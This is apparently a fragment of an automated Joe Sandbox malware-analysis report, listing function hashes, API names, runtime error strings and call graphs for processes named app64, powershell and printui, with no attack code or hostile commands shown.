                                                                                                                                                                                • Associated: 00000000.00000002.2030289213.00007FF7DF11E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7df110000_app64.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __acrt_iob_func
                                                                                                                                                                                • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                                • API String ID: 711238415-3474627141
                                                                                                                                                                                • Opcode ID: 140faf41e5dcb172f6cda8969dcdfc88495d0d7b1d81eb36e90e53d096599807
                                                                                                                                                                                • Instruction ID: c869ac2bac33a3fcd280681b07453f2136ee1450f7acd49b07c65d62d9efb161
                                                                                                                                                                                • Opcode Fuzzy Hash: 140faf41e5dcb172f6cda8969dcdfc88495d0d7b1d81eb36e90e53d096599807
                                                                                                                                                                                • Instruction Fuzzy Hash: 9501A962908ED9C1D6169F1CF8011EEB374FF9AB55FA45322EA8C26224DF2AD643C710

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 421 7ff7df1140d0-7ff7df1140d7 __acrt_iob_func call 7ff7df114f60
                                                                                                                                                                                APIs
                                                                                                                                                                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7DF114088
                                                                                                                                                                                  • Part of subcall function 00007FF7DF114F60: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,00007FF7DF1150F3,?,?,00007FF7DF11A070,00007FF7DF111341), ref: 00007FF7DF114F88
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.2029869177.00007FF7DF111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DF110000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.2029080815.00007FF7DF110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030245412.00007FF7DF116000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030261792.00007FF7DF117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030276158.00007FF7DF11B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030289213.00007FF7DF11E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7df110000_app64.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __acrt_iob_func__stdio_common_vfprintf
                                                                                                                                                                                • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                                • API String ID: 2168557111-2713391170
                                                                                                                                                                                • Opcode ID: f5c4c673405eb37abb60c77630466fe3230ee507e0084f0eb3e801a9ee4fd253
                                                                                                                                                                                • Instruction ID: adb1d65b041b4e0c514e9b731f6fffd1f07298c43607934f795d5b43d5dac9df
                                                                                                                                                                                • Opcode Fuzzy Hash: f5c4c673405eb37abb60c77630466fe3230ee507e0084f0eb3e801a9ee4fd253
                                                                                                                                                                                • Instruction Fuzzy Hash: CAF04452818E9981D2429F1CB8000EEA374FF9EB55FA45326EA8D26165DF19D6478720
                                                                                                                                                                                APIs
                                                                                                                                                                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7DF114088
                                                                                                                                                                                  • Part of subcall function 00007FF7DF114F60: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,00007FF7DF1150F3,?,?,00007FF7DF11A070,00007FF7DF111341), ref: 00007FF7DF114F88
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.2029869177.00007FF7DF111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DF110000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.2029080815.00007FF7DF110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030245412.00007FF7DF116000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030261792.00007FF7DF117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030276158.00007FF7DF11B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030289213.00007FF7DF11E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7df110000_app64.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __acrt_iob_func__stdio_common_vfprintf
                                                                                                                                                                                • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                                • API String ID: 2168557111-2187435201
                                                                                                                                                                                • Opcode ID: 8c872b7c2e415e1836a66fc54273c071ac34ab900437702af3d25337e00bffc9
                                                                                                                                                                                • Instruction ID: abe7c9fc5de8e732fb31fd35a922f30c8ea081aacc281c2ff646b24b8e26db1d
                                                                                                                                                                                • Opcode Fuzzy Hash: 8c872b7c2e415e1836a66fc54273c071ac34ab900437702af3d25337e00bffc9
                                                                                                                                                                                • Instruction Fuzzy Hash: C0F04F52818E9981D2419F1CB8000EEA374FF9EB99FE45326EA8D2A165DF29D6478720
                                                                                                                                                                                APIs
                                                                                                                                                                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7DF114088
                                                                                                                                                                                  • Part of subcall function 00007FF7DF114F60: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,00007FF7DF1150F3,?,?,00007FF7DF11A070,00007FF7DF111341), ref: 00007FF7DF114F88
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.2029869177.00007FF7DF111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DF110000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.2029080815.00007FF7DF110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030245412.00007FF7DF116000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030261792.00007FF7DF117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030276158.00007FF7DF11B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030289213.00007FF7DF11E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7df110000_app64.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __acrt_iob_func__stdio_common_vfprintf
                                                                                                                                                                                • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                                • API String ID: 2168557111-4273532761
                                                                                                                                                                                • Opcode ID: 8dd72cedd46a00d4fb9445a9f2495915b1cc521f2e7ceaed8a349cc712e5405c
                                                                                                                                                                                • Instruction ID: 5687938f071ed81b1597804ad8c888e4df3e5008ea0681e4d852c34bf36a25c3
                                                                                                                                                                                • Opcode Fuzzy Hash: 8dd72cedd46a00d4fb9445a9f2495915b1cc521f2e7ceaed8a349cc712e5405c
                                                                                                                                                                                • Instruction Fuzzy Hash: 2AF04F52818E9981D2019F18B8000EEA374FF9EB99FA45326EA8D2A525DF29D6478720

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 425 7ff7df1140e0-7ff7df1140e7 __acrt_iob_func call 7ff7df114f60
                                                                                                                                                                                APIs
                                                                                                                                                                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7DF114088
                                                                                                                                                                                  • Part of subcall function 00007FF7DF114F60: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,00007FF7DF1150F3,?,?,00007FF7DF11A070,00007FF7DF111341), ref: 00007FF7DF114F88
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.2029869177.00007FF7DF111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DF110000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.2029080815.00007FF7DF110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030245412.00007FF7DF116000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030261792.00007FF7DF117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030276158.00007FF7DF11B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030289213.00007FF7DF11E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7df110000_app64.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __acrt_iob_func__stdio_common_vfprintf
                                                                                                                                                                                • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                                • API String ID: 2168557111-4283191376
                                                                                                                                                                                • Opcode ID: 65d191c5d6f4d3559b8a533d186793d415b38b4c167d9c244c3c1c99a9624cc9
                                                                                                                                                                                • Instruction ID: 9b8f5a61fcbe5f77b789e9bdce58a2e4584837c67fb42469f46f049f0bce1f16
                                                                                                                                                                                • Opcode Fuzzy Hash: 65d191c5d6f4d3559b8a533d186793d415b38b4c167d9c244c3c1c99a9624cc9
                                                                                                                                                                                • Instruction Fuzzy Hash: 69F04F52818E9981D2419F1CB8000EEA374FF9EB99FA45326EA8D2A165DF29D647C720

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 429 7ff7df1140f0-7ff7df1140f7 __acrt_iob_func call 7ff7df114f60
                                                                                                                                                                                APIs
                                                                                                                                                                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7DF114088
                                                                                                                                                                                  • Part of subcall function 00007FF7DF114F60: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,00007FF7DF1150F3,?,?,00007FF7DF11A070,00007FF7DF111341), ref: 00007FF7DF114F88
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.2029869177.00007FF7DF111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DF110000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.2029080815.00007FF7DF110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030245412.00007FF7DF116000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030261792.00007FF7DF117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030276158.00007FF7DF11B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030289213.00007FF7DF11E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7df110000_app64.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __acrt_iob_func__stdio_common_vfprintf
                                                                                                                                                                                • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                                • API String ID: 2168557111-4064033741
                                                                                                                                                                                • Opcode ID: 3054fceabc99cc34a37f6b6646949d82a52c415b5e755e153087ec514acf73b0
                                                                                                                                                                                • Instruction ID: e84ef1fb27b3270817e387c376e4702166807fc90999d068deef9b62ba60018f
                                                                                                                                                                                • Opcode Fuzzy Hash: 3054fceabc99cc34a37f6b6646949d82a52c415b5e755e153087ec514acf73b0
                                                                                                                                                                                • Instruction Fuzzy Hash: 12F0AF52808E9981D2019F1CB8000EEA334FF9EB99FA45326EA8D2A125DF29D6438320
                                                                                                                                                                                APIs
                                                                                                                                                                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7DF114088
                                                                                                                                                                                  • Part of subcall function 00007FF7DF114F60: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,00007FF7DF1150F3,?,?,00007FF7DF11A070,00007FF7DF111341), ref: 00007FF7DF114F88
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.2029869177.00007FF7DF111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DF110000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.2029080815.00007FF7DF110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030245412.00007FF7DF116000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030261792.00007FF7DF117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030276158.00007FF7DF11B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030289213.00007FF7DF11E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7df110000_app64.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __acrt_iob_func__stdio_common_vfprintf
                                                                                                                                                                                • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                                • API String ID: 2168557111-2468659920
                                                                                                                                                                                • Opcode ID: 818479f690776c5ec038c1c26f68d1c8bf19d806dfb0726f8782f9f0e1d70c58
                                                                                                                                                                                • Instruction ID: bd5970bd9b28bf42b3493f42596c00428c66a473f09d80a8c0fda0c29f87b762
                                                                                                                                                                                • Opcode Fuzzy Hash: 818479f690776c5ec038c1c26f68d1c8bf19d806dfb0726f8782f9f0e1d70c58
                                                                                                                                                                                • Instruction Fuzzy Hash: B9F06253819E8981D2019F18B8000EFB374FF5EB99F945326EF8C2A225DF29D643C720
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.2259856068.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ff848ff0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8a52707125c65ee9f643f2df062633dacb8f8b83a1639b2650643bf4c70ccfee
                                                                                                                                                                                • Instruction ID: f67be5a760978fac223f8c4efae0205a9b431c8b06ad5bea4d83e146a0617c7d
                                                                                                                                                                                • Opcode Fuzzy Hash: 8a52707125c65ee9f643f2df062633dacb8f8b83a1639b2650643bf4c70ccfee
                                                                                                                                                                                • Instruction Fuzzy Hash: B3D16A31E0EA8A5FF35AA77C58551B57BE1EF422A0F0801FFD149C71D3EE09A8868359
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.2259856068.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ff848ff0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ed20ab6a9407878a7db610c299af3f3cb7783efd9afd6f8632f58481ab0395bd
                                                                                                                                                                                • Instruction ID: f540069f2f7620f8e5254f92a34524b65575e9c277a68713acf857fdb14baca7
                                                                                                                                                                                • Opcode Fuzzy Hash: ed20ab6a9407878a7db610c299af3f3cb7783efd9afd6f8632f58481ab0395bd
                                                                                                                                                                                • Instruction Fuzzy Hash: 15213531E0EA8A0FF3AAA778644117966C1EF022A0F4801FBD10CC71D3EF1DAC858229
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.2259107081.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ff848f20000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                • Instruction ID: 8979d17b611d2f02bd41aeeb7e19fc684a639d902bce64cf38cc553155f26dc5
                                                                                                                                                                                • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                • Instruction Fuzzy Hash: 7701677111CB0D4FDB44EF0CE451AA6B7E0FB95364F10056EE58AC36A5D736E882CB46
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.2213223821.00007FF67A0E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67A0E0000, based on PE: true
                                                                                                                                                                                • Associated: 0000000A.00000002.2213189244.00007FF67A0E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000A.00000002.2213277015.00007FF67A0E2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000A.00000002.2213314384.00007FF67A0E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff67a0e0000_printui.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLastValue$CloseCreateDeleteLibraryLoadQueryWindow$AddressClassCommandCursorDestroyFreeHeapInformationLineObjectOpenProcRegisterStock
                                                                                                                                                                                • String ID: PrintUIEntryW$Software\Microsoft\Windows\CurrentVersion\PrinterInstallation$StubPrintWindow$UIEntry$printui.dll
                                                                                                                                                                                • API String ID: 2613610799-4035671587
                                                                                                                                                                                • Opcode ID: 456eba1b0848363f44b5dc1ad55adb208842debec6c41e3cfc997a71327bd480
                                                                                                                                                                                • Instruction ID: a3998a8bc68692d639477a02484ab84f0df5ccaeb98c6b5b946a5338b868b09a
                                                                                                                                                                                • Opcode Fuzzy Hash: 456eba1b0848363f44b5dc1ad55adb208842debec6c41e3cfc997a71327bd480
                                                                                                                                                                                • Instruction Fuzzy Hash: AFA14A33A28A42CAEB109B60E4447BD7BA0FB5DB89F4155B9DA0E83B64CF7CE145D700
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.2213223821.00007FF67A0E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67A0E0000, based on PE: true
                                                                                                                                                                                • Associated: 0000000A.00000002.2213189244.00007FF67A0E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000A.00000002.2213277015.00007FF67A0E2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000A.00000002.2213314384.00007FF67A0E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff67a0e0000_printui.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4104442557-0
                                                                                                                                                                                • Opcode ID: 620f975a63dfef7962d64ab17e7f439f8fad081d60c42cdb74dd755226332b19
                                                                                                                                                                                • Instruction ID: 975f796ef2fddb1a54c4edbb53f3b4f477b23993b91bc1cf6e33d78b526cdf3c
                                                                                                                                                                                • Opcode Fuzzy Hash: 620f975a63dfef7962d64ab17e7f439f8fad081d60c42cdb74dd755226332b19
                                                                                                                                                                                • Instruction Fuzzy Hash: B5111F22618B428AEB10EF70E85426833A4FB5C75CF400E79EA6D87764EF7CE6649340
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000A.00000002.2213223821.00007FF67A0E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67A0E0000, based on PE: true
                                                                                                                                                                                • Associated: 0000000A.00000002.2213189244.00007FF67A0E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000A.00000002.2213277015.00007FF67A0E2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000A.00000002.2213314384.00007FF67A0E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ff67a0e0000_printui.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_cexit_inittermexit
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 642454821-0
                                                                                                                                                                                • Opcode ID: d036f23a73c2ceeb0dc0bbf8eea258f05a7f4c7e4edc28ade6a86160fbf4be78
                                                                                                                                                                                • Instruction ID: 352a9e8a0ab7f036f0f5733b298d955a4248ea33e668fb216e45a04c5383ac22
                                                                                                                                                                                • Opcode Fuzzy Hash: d036f23a73c2ceeb0dc0bbf8eea258f05a7f4c7e4edc28ade6a86160fbf4be78
                                                                                                                                                                                • Instruction Fuzzy Hash: 42613A27E2C60382EB64AB11E54063937A1BB68B88F4409F9DA4DD73B0DF3CF941A701

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:37.5%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                Total number of Nodes:73
                                                                                                                                                                                Total number of Limit Nodes:2
                                                                                                                                                                                execution_graph 187 7ff67a0e1570 GetStartupInfoW 188 7ff67a0e15af 187->188 189 7ff67a0e15c1 188->189 190 7ff67a0e15ca Sleep 188->190 191 7ff67a0e15e6 _amsg_exit 189->191 192 7ff67a0e15f4 189->192 190->188 191->192 193 7ff67a0e166a _initterm 192->193 194 7ff67a0e1687 _IsNonwritableInCurrentImage 192->194 199 7ff67a0e164b 192->199 193->194 194->199 201 7ff67a0e10e0 HeapSetInformation 194->201 197 7ff67a0e1750 197->199 200 7ff67a0e1759 _cexit 197->200 198 7ff67a0e1748 exit 198->197 200->199 202 7ff67a0e1d26 201->202 203 7ff67a0e112c LoadCursorW GetStockObject RegisterClassW CreateWindowExW RegCreateKeyExW 202->203 204 7ff67a0e12c4 GetLastError 203->204 205 7ff67a0e1219 RegQueryValueExW 203->205 206 7ff67a0e12d0 LoadLibraryExW 204->206 207 7ff67a0e1252 205->207 208 7ff67a0e12fb GetProcAddress 206->208 209 7ff67a0e12eb GetLastError 206->209 210 7ff67a0e1267 RegDeleteValueW 207->210 211 7ff67a0e1258 207->211 212 7ff67a0e127e RegSetValueExW 207->212 215 7ff67a0e1327 GetCommandLineW 208->215 216 7ff67a0e1319 GetLastError 208->216 214 7ff67a0e1361 RegOpenKeyExW 209->214 210->211 211->212 213 7ff67a0e12b2 RegCloseKey 211->213 212->213 213->206 219 7ff67a0e1394 RegQueryValueExW RegCloseKey RegDeleteKeyExW 214->219 220 7ff67a0e13f9 GetLastError 214->220 225 7ff67a0e1008 215->225 217 7ff67a0e1350 FreeLibrary 216->217 217->214 221 7ff67a0e1405 219->221 220->221 223 7ff67a0e140a DestroyWindow 221->223 224 7ff67a0e1419 221->224 223->224 224->197 224->198 226 7ff67a0e1020 225->226 227 7ff67a0e10ca 225->227 228 7ff67a0e103e 226->228 229 7ff67a0e1028 iswspace 226->229 227->217 228->227 230 7ff67a0e1087 iswspace 228->230 231 7ff67a0e1051 228->231 229->226 229->228 230->228 230->231 231->227 232 7ff67a0e10b4 iswspace 231->232 232->227 232->231 233 7ff67a0e1520 __wgetmainargs 234 7ff67a0e1d50 _XcptFilter 235 7ff67a0e1810 236 7ff67a0e1819 235->236 237 7ff67a0e1824 236->237 238 7ff67a0e1ba0 RtlCaptureContext RtlLookupFunctionEntry 236->238 239 7ff67a0e1be5 RtlVirtualUnwind 238->239 240 7ff67a0e1c27 238->240 239->240 243 7ff67a0e1b5c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 240->243 244 7ff67a0e1840 245 7ff67a0e1872 244->245 246 7ff67a0e184f 244->246 246->245 247 7ff67a0e186b ?terminate@ 246->247 247->245 248 7ff67a0e1440 252 7ff67a0e1452 248->252 250 7ff67a0e14b9 __set_app_type 251 7ff67a0e14f6 250->251 253 7ff67a0e14ff __setusermatherr 251->253 254 7ff67a0e150c 251->254 255 7ff67a0e1908 GetModuleHandleW 252->255 253->254 256 7ff67a0e191d 255->256 256->250 257 7ff67a0e1880 SetUnhandledExceptionFilter 258 7ff67a0e17e0 261 7ff67a0e1a54 258->261 262 7ff67a0e17e9 261->262 263 7ff67a0e1a80 6 API calls 261->263 263->262 264 7ff67a0e1789 265 7ff67a0e17a1 264->265 266 7ff67a0e1798 _exit 264->266 267 7ff67a0e17aa _cexit 265->267 268 7ff67a0e17b6 265->268 266->265 267->268

                                                                                                                                                                                Callgraph

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.2687684615.00007FF67A0E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67A0E0000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.2687662517.00007FF67A0E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.2687703393.00007FF67A0E2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.2687721986.00007FF67A0E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff67a0e0000_printui.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLastValue$CloseCreateDeleteLibraryLoadQueryWindow$AddressClassCommandCursorDestroyFreeHeapInformationLineObjectOpenProcRegisterStock
                                                                                                                                                                                • String ID: PrintUIEntryW$Software\Microsoft\Windows\CurrentVersion\PrinterInstallation$StubPrintWindow$UIEntry$printui.dll
                                                                                                                                                                                • API String ID: 2613610799-4035671587
                                                                                                                                                                                • Opcode ID: e89becaa4b4c2da40ab99fedc63f44ed43bcaaa6e32622ee94d5cb7eade183ba
                                                                                                                                                                                • Instruction ID: a3998a8bc68692d639477a02484ab84f0df5ccaeb98c6b5b946a5338b868b09a
                                                                                                                                                                                • Opcode Fuzzy Hash: e89becaa4b4c2da40ab99fedc63f44ed43bcaaa6e32622ee94d5cb7eade183ba
                                                                                                                                                                                • Instruction Fuzzy Hash: AFA14A33A28A42CAEB109B60E4447BD7BA0FB5DB89F4155B9DA0E83B64CF7CE145D700

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
